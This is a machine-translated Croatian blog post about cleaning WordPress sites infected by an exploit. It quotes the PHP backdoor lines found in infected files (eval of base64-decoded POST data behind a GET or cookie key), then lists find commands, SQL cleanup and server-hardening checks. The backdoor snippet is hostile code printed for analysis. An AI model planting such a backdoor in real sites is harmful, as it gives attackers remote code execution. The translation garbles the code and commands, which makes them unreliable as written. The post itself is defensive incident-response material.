WordPress iskorištavati - čišćenje zaraženih datoteka i SQL Server sigurnost.

Prije nego što pročitate ovaj post, trebali biste vidjeti , Da bi razumjeli nešto. :)

Našli smo mnoge od blogova na stealthsettings.com datoteka, kod sličnih na niže, koji proizlaze iz virusarii s WordPress iskorištavaju.:

? <PHP ako ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'file'])); izlaz; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcAko gore je o datoteci xmlrpc.php od pospan, U grep poslužitelja, izgleda dosta ove vrste u source koda.

pppffiuuu

Čišćenje zaraženih datoteka:

Ooookkkk ...
1. Najbolje rješenje, kao što je to učinjeno rezervaI čisti baza je brisanje slika WordPress (Možete zadržati datoteku wp-config.php i nije striktno vezana za WP platformi nakon što je pažljivo provjeriti) na poslužitelju i napraviti izvornu verziju upload 2.5.1 (Na tom prigodom i napraviti nadogradnju verzije :) wp) http://wordpress.org/download/ . Obrišite uključujući i tematski datoteke ako ne vjeruju da njihov pažljivoj provjeri.

Čini se da su pogođeni i slika od tema koje nisu korištene prije nego što se na blogu i jednostavno mijenjanje teme, ne riješiti problem.

./andreea/wp-content/themes/default/index.php:<?php ako ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' file '])); Exit; ?}> <PHP get_header (); ?>

2. Pretraživanje i brisanje svih datoteka koje sadrže:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg i wp-info.txt datoteku, ako ih ima.

Pronađite. -Naziv "* _new.php"
Pronađite. -Naziv "* _old.php"
Pronađite. -Ime "*. Jpgg"
Pronađite. -Naziv "* _giff"
Pronađite. -Naziv "* _pngg"
Pronađite. -Naziv "wp-info.txt"

3. u / Tmp , Pretraživanje i brisanje mape kao što su tmpYwbzT2

SQL čišćenje :

1. i Tablica wp_options Provjerite i brisanje linije: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Sve u wp_options, idite na active_plugins i izbrisati ako postoji plugin koji završava u jednom od nastavaka * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ili ako se sumnja na drugom lokalnom, pažljivo provjerite.

3. U tablici wp_users, Vidjeti postoji li korisnik koji nije napisao ništa u svojoj desnoj strani, stupac user_nicename. Brisanje korisnika, ali imajte na umu broj na ID stupac. Ovaj korisnik može koristiti "WordPress" kao user_login stvara se i pojavljuje se na 00: 00: 00 0000-00-00.

4. Idi na tablici wp_usermeta i izbrisati sve linije koje pripadaju ID gore.

Nakon što ste učinili ovaj SQL čišćenje, onemogućili i zatim omogućiti određeni plugin. (U blogu -> Nadzorna ploča -> Plugins)

Sigurna poslužitelja:

1. Pogledajte što direktorije i datoteke "pisati"(Chmod 777) i pokušati staviti na njih u chmod da neće dopustiti svoje pisanje na bilo kojoj razini. (Chmod 644, primjerice)

Pronađite. -Perm-2-LS

2. Pogledajte što slika postavljen bit suid ili SGID . Ako ne koristite te datoteke staviti na njih chmod 0 ili deinstalirati paket koji sadrži. Oni su vrlo opasni, jer oni izvršavati privilegije "skupina"Ili"korijen"Ne s normalnim korisnik povlastice izvršiti tu datoteku.

pronaći /-tip f-Perm-04000-LS
pronaći /-tip f-Perm-02000-LS

3. Provjerite što portovi su otvoreni i pokušajte zatvoriti ili osigurati onima koji se ne koriste.

netstat-| grep-i slušanje

Toliko. Vidim Google Search i drugi kažu: "Pa jesu!". Pa dobro što su to učinili ... ali znate li Google počinje zabrana sve web stranice formiranje SPAM i staviti trojanaca (Trojan.Clicker.HTML) U kolačića?

WordPress iskorištavati - čišćenje zaraženih datoteka i SQL Server sigurnost.

O autoru

potajno

Strastveni o svemu što gadget i pisati rado stealthsettings.com od 2006 i volim otkrivati ​​nove stvari s vama o računalima i MacOS, Linux, Windows, iOS i Android.

Kako 1

Ostavite komentar

Ova web stranica koristi Akismet za smanjenje neželjene pošte. Saznajte kako se podaci vašeg komentara obrađuju.